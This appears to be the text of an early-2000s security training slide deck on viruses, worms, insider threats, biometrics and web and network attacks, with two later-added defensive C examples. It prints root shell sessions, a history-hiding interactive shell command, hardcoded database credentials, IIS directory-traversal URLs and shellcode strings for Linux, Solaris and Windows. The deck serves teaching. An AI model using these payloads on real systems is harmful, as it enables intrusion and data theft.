final target compromised

#> rlogin -l root tgtsunprod2
Last login: Tue Jul 3 14:52:41 from tgtsunprod1
Sun Microsystems Inc.   SunOS 5.8       Generic February 2000
***** Warning Government Classified Server ***
You have mail.
tgtsunprod2 #/usr/sbin/ifconfig -au
lo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1
        inet 127.0.0.1 netmask ff000000
qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
        inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255
        ether 8:0:20:f7:d0:78
dhsunprod2 #uname -a
SunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80
tgtsunprod2 #id
uid=0(root) gid=1(other)

Who am I?

The Threat is Active
• The blackhat community is extremely active.
  – 20+ unique scans a day.
  – 100% - 900% increase of activity from 2000 to 2001
  – It's only getting worse

Don't Underestimate Cyberterrorists

Information Security is Important …
…because we have so many friends

The Attack
68.168.1.15:52312 -> 127.0.0.1:443
[..]
68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

Doom on You….
    <SCRIPT LANGUAGE="VBScript" RUNAT="Server">
    Sub Application_OnStart
        Set Db = Server.CreateObject("Commerce.DbServer")
        Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
        Db.Application = "http://10.1.1.16/"
        Set Application("Db") = Db
    End Sub

    Sub Session_OnStart
        '==Visual InterDev Generated - DataConnection startspan==
        '--Project Data Connection
        Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
        Session("DataConn_ConnectionTimeout") = 15
        Session("DataConn_CommandTimeout") = 30
        Session("DataConn_RuntimeUserName") = ""
        Session("DataConn_RuntimePassword") = ""
        '==Visual InterDev Generated - DataConnection endspan==
    End Sub
    </SCRIPT>

User ID: sa
Password: n0t4u2c

Trojan Horse
Sept 26, 2001
• Crackers posted a Trojan Horse masquerading as a wu-ftpd exploit on the Vuln-Dev mailing list.
• If the code is compiled and run, it will delete most files on the host's hard drive

XSS Filter-Bypass Manipulation
• This technique is used to pass various types of client-side scripting language through implemented security filters.
• The idea is to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.

E-mail Virus
Oct 2001
• BT Openworld's billing department has been sending out the BadTrans virus with its responses to recent e-mail inquiries
  – The virus launches a Trojan horse in infected machines
  – BT Openworld is a subsidiary of British Telecommunications offering internet services for business and home use

Format String Vulnerabilities
Any call that passes user-supplied input directly to a *printf()-family function is dangerous. These calls can also be identified by their argument deficiency: the format string asks for more arguments than the call supplies.
Consider this code:
    printf("%s", userdata);
    printf(userdata);        <- argument deficiency

Fingerprint Recognition: Sensors (I)
• Optical fingerprint sensor [Fingerprint Identification Unit FIU-001/500 by Sony]
• Electro-optical sensor [DELSY® CMOS sensor module]
• Capacitive sensor [FingerTIP™ by Infineon]

Physical Access Controls
• Network Segregation
• Perimeter Security
• Security Guards
• Badge Systems
• Biometric Access Controls
• Closed Circuit TV Monitoring
• Sensors & Alarms

World Trade Center Virus
• The destructive TROJ_VOTE.A e-mail virus exploits the WTC tragedy
  – It attacks the infected user's address book to spread and sends a message about peace between America and Islam
  – It also installs two VBS files which attempt to delete the Windows directory on reboot

The Threat from the Insider

NIMDA Worm
• The NIMDA worm raced around the world in only 30 minutes when it was first released in Sept 2001
• Some AV experts recommended disconnecting from the Internet until patches and upgrades could be put into effect.

Iris Recognition
System for passive iris recognition by Sensar

Wireless Attacks
• Wireless hacking is an increasing threat to wired networks
  – Attackers can penetrate, monitor, and manipulate data on traditional wired networks by accessing the system through its wireless sub-network.
  – The attacker can intercede between two wired hosts behind a firewall, between a wired host and a wireless host, or between two wireless clients
  – Uses a "man-in-the-middle" Address Resolution Protocol (ARP) cache poisoning attack.
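As an added illustration of the Format String Vulnerabilities slide (this is not code from the original deck): the safe call from the slide next to a small conversion counter that a reviewer, or a logging wrapper that must accept a dynamic format, can use to detect argument deficiency before anything reaches a *printf() call. The function names and the sample string are constructed for this example.

```c
#include <stdio.h>

/* Count the conversions a format string will consume.  "%%" is a literal
 * percent sign and consumes no argument; a lone trailing '%' is counted so
 * that a malformed format is rejected as well. */
int count_conversions(const char *fmt) {
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent: skip both characters */
            p++;
            continue;
        }
        n++;                    /* %s, %d, %x, %n, ... each want an argument */
    }
    return n;
}

/* Argument deficiency check: a format that wants more arguments than the
 * caller supplies reads (or, with %n, writes) whatever happens to be on the
 * stack.  Returns 1 when the format is safe to hand to a *printf() call. */
int format_is_safe(const char *fmt, int nargs_supplied) {
    return count_conversions(fmt) <= nargs_supplied;
}

/* The safe pattern from the slide: user data is only ever an argument,
 * never the format.  Returns printf()'s character count (negative on error). */
int log_user_data(const char *userdata) {
    return printf("%s\n", userdata);
}

int main(void) {
    /* Constructed sample of attacker-controlled input. */
    const char *userdata = "%x %x %x %n";
    /* printf(userdata) would consume four arguments nobody passed;
     * the counter reports a demand of 4 against 0 supplied. */
    printf("demand=%d safe=%d\n", count_conversions(userdata),
           format_is_safe(userdata, 0));
    log_user_data(userdata);    /* printed literally, no conversion happens */
    return 0;
}
```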
Attack the Architecture
(diagram: the Web Server dispatches a request by handler: the html handler returns the .html file with a text/html header; the shtml handler processes SSI tags (#include, #exec) through /bin/sh, perl, … and an include file; the cgi handler runs the script/executable; the jsp handler passes the .jsp through the Java compiler and Java Runtime to produce a class; anything else goes to the default handler)

SirCam Worm
• SirCam surfaced in mid-July 2001
  – Scoops up documents in an infected PC and mails them to people in the user's address book
  – The most damaging aspect is its ability to enlist dormant viruses in the users' files and mail them to others
  – Result: viruses that might not have spread very far alone get wider distribution, and older viruses get new life
  – By Aug 2001, SirCam had infected over 100,000 computers in the US

Viruses – File (Parasitic) Viruses
• Simple File Viruses
  – After transplanting itself in the executable, the executable often doesn't work
• Stealth Component
  – Works very similarly to stealth system sector viruses
  – Masks the file size of infected files when a directory listing is done on them

CyberTerrorism – Oct 2001
• The Pakistani hacker group G-Force defaced a US government web site and threatened to turn over "some very high confidential US data" to Al Qaeda officials if the war on terrorism continues
• This comes days after a government warning of sophisticated and sustained cyberattacks launched by pro-Muslim hacker groups such as G-Force, Doktor Nuker, and the Pakistan Hackerz Club

Redesi Worm – Oct 2001
• An e-mail attachment purporting to be a Microsoft software security patch is actually a worm
  – It spreads through e-mail
  – On Nov 11 the worm will reformat the C: drive of infected machines

Discretionary Access Control List (DACL)
• The DACL controls who can access the object and how.
(figure: the object's Access Control Settings dialog, which shows permissions for only one user or one group at a time)

Credit Card Stealing Trojan
• Reported on Oct 29, 2001 - Septer
  – Preying on sympathies for terrorist attack victims, a credit card stealing trojan horse masquerading as an appeal for donations from the American Red Cross is making the rounds via e-mail
  – Users click on the executable attachment and a donation request form loads. If completed, credit card numbers and contact information are saved and uploaded to a Web site.

NT Rootkit
• Rootkit console with keyboard sniffing

Former Employee Attack
• Wendy Sholds allegedly broke into her former boss's computer
  – She forwarded confidential e-mail to other employees
  – She used the boss's username and password to view private information on the company web site

Security Models
• Security Models
  – Bell-LaPadula
  – Biba
  – Chinese Walls
  – Clark-Wilson

Hacker Alliance
• Three pro-Islamic hacker groups have joined forces to carry out attacks
  – Each group is carrying out digital attacks under a common banner
  – They are anti-Israel, anti-US/UK, anti-India

IIS Double Hex
Round 1 Decoding:
    scripts/..%255c../winnt
becomes:
    scripts/..%5c../winnt        (%25 = "%" character)
Round 2 Decoding:
    scripts/..%5c../winnt
becomes:
    scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double Hex Encoding.

USA Today Site Hacked
• The "USA Today" website was defaced with six bogus stories
• The site was taken offline for three hours

Security Testing
• Software will never be placed or deployed into a trusted or predictable environment
• Security testing requires attacking the software in a way that exercises the trust relationships.
• The software should be tested in ways that are unexpected while observing for behaviors that are unknown.
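As an added example of the two decoding rounds the IIS Double Hex slide walks through (this is not code from the original deck): a normalizer that keeps decoding until the path stops changing, reports how many rounds decoded something (two or more is the double-encoding signature), and only then looks for an upward ".." segment under either separator, so a check done before the second round cannot be bypassed. Function names and the 512-byte buffers are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}
/* One round of %XX decoding; returns 1 if any escape was decoded. */
int percent_decode_once(const char *in, char *out, size_t outlen) {
    size_t o = 0; int changed = 0, hi, lo;
    for (const char *p = in; *p && o + 1 < outlen; p++) {
        if (*p == '%' && (hi = hexval(p[1])) >= 0 && (lo = hexval(p[2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);   /* %25 -> '%', %5c -> '\' */
            p += 2;
            changed = 1;
        } else out[o++] = *p;
    }
    out[o] = '\0';
    return changed;
}
/* Decode until the path stops changing (bounded).  Returns how many rounds
 * decoded something: 1 is ordinary encoding, 2+ is the slide's double hex. */
int decode_rounds(const char *path, char *out, size_t outlen) {
    char tmp[512];
    int rounds = 0;
    snprintf(out, outlen, "%s", path);
    while (rounds < 8 && percent_decode_once(out, tmp, sizeof tmp)) {
        snprintf(out, outlen, "%s", tmp);
        rounds++;
    }
    return rounds;
}
/* 1 if the fully decoded path has a ".." segment under '/' or '\'.
 * Checking only after full decoding is what defeats the obfuscation. */
int has_traversal(const char *path) {
    char dec[512];
    decode_rounds(path, dec, sizeof dec);
    for (char *p = dec; *p; p++) if (*p == '\\') *p = '/';   /* unify separators */
    for (const char *p = dec; ; ) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.') return 1;
        if (!end) return 0;
        p = end + 1;
    }
}
```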
Student Data Exposed
• The permission level to access web logs at Resicom, a telecommunications company that provides intra-campus phone services to colleges, was set too low
  – It allowed people to search for student names, social security numbers and addresses

Microsoft Misrepresented Security
• A Federal Trade Commission (FTC) investigation found that Microsoft misrepresented both the level of security provided and the amount of data collected by its Passport services
  – Microsoft agreed to refrain from making false claims about the information it collects and will submit to an independent audit of its security program every two years.

Programming Satan's Computer

Cell Phone Virus
• A worm-type virus called Timofonica hit customers of Spain's Movistar service
  – It sends text messages scrolling across the screens of cellular phones
  – It is the first virus known to target cell phones
  – We can now expect copycat viruses targeting cell phones and other hand-held devices such as Palm Pilots and Pocket PC computers

Microsoft Breakin
• A hacker broke into BetaPlace.com, Microsoft's web site for beta testers
  – Evidently someone's log-in credentials were leaked to the Internet.
  – Microsoft shut down the site after it became aware of the breach; it also reset user passwords.
  – The site contains unreleased versions of Windows, other software and activation keys.
  – A spokesman said the intruder did not access source code. The event has sparked a criminal investigation.

HTTP 1.1 Methods
The Method token indicates the method to be performed on the resource identified by the Request-URI.
Buffer Overflows
• Overwrite return address
  – Examples of shell-code strings:

LINUX on Intel:
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

SPARC Solaris:
    char shellcode[] =
        "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
        "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
        "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
        "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

Windows:
    char shellcode[] =
        "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45"
        "\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x03"
        "\x80\x6D\xF8\x50"
        "\x8D\x45\xFC\x50\x90\xB8"
        "EXEC"
        "\xFF\xD0\x33\xC0\x50\x90"
        "\xB8"
        "EXIT"
        "\xFF\xD0\xC3";

Different Threat Scenarios
1. Regular biometric sensor using artificially generated biometric data
2. Replay attack of eavesdropped biometric data
3. Manipulation of stored biometric reference data

SNMP Management

Normal CAM Behavior III
(figure: CAM table MAC A / Port 1, MAC B / Port 2, MAC C / Port 3; A sends a frame to B from Port 1, B sees it, and C does not see the traffic to B because the switch knows "B is on Port 2")

Double Encapsulated 802.1q VLAN Hopping Attack
(figure: the attacker's double-tagged frame enters the first switch, which strips off the first tag and sends the frame back out over the trunk)
• Send double encapsulated 802.1Q frames
• Switch performs only one level of decapsulation
• Unidirectional traffic only
• Works even if trunk ports are set to off
Note: Only works if trunk has the same native VLAN as the attacker

Hacking Cisco

Cisco Bugtraq Vulnerabilities
• 1998 - 3
• 1999 - 5
• 2000 - 23
• 2001 - 46
• 2002 (est) - 94

Typical Web Application Set-Up
(diagram: the Web Client sends an HTTP request (cleartext or SSL) through the Firewall to the Web Server, which hosts several Web apps; the Web apps reach the SQL Database over a database connection; the HTTP reply carries HTML, Javascript, VBscript, etc.)
• Web Server: Apache, IIS, Netscape, etc…
• Plugins: Perl, C/C++, JSP, etc.
• Database connection: ADO, ODBC, etc.

Traditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.

    ...
    winsock_found:
        xor     eax, eax
        push    eax
        inc     eax
        push    eax
        inc     eax
        push    eax
        call    socket
        cmp     eax, -1
        jnz     socket_ok
        push    sockerrl
        push    offset sockerr
        call    write_console
        jmp     quit2
    socket_ok:
        mov     sock, eax
        mov     sin.sin_family, 2
        mov     esi, offset _port
    ...

NT IIS Showcode ASP Vulnerability
• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../boot.ini

The MDAC Attack
(diagram: Client (Internet Explorer or VB.exe) sends HTML over a URL to the Server: IIS ASP Server (ADO) and ODBC Provider on one path, Remote Data Service (RDS Data Control, RDS Data Space, RDS OLE Data Factory, Custom Business Objects) on the other, both reaching the DB through the Jet Provider / Jet 3.5)

Missile of Death
(diagram: a Web Server hosting several Web apps in front of two DBs, as in the Typical Web Application Set-Up slide)

An Example: Brute Forcing Session ID's in URLS
AUTOMATED DEMO!

$8.8 Billion Mistake by Microsoft
• According to Computer Economics, the worldwide economic impact of the Love Bug Virus was estimated at $8.75 billion
• The fact that Microsoft Outlook was designed to execute programs that were mailed to it made the virus possible.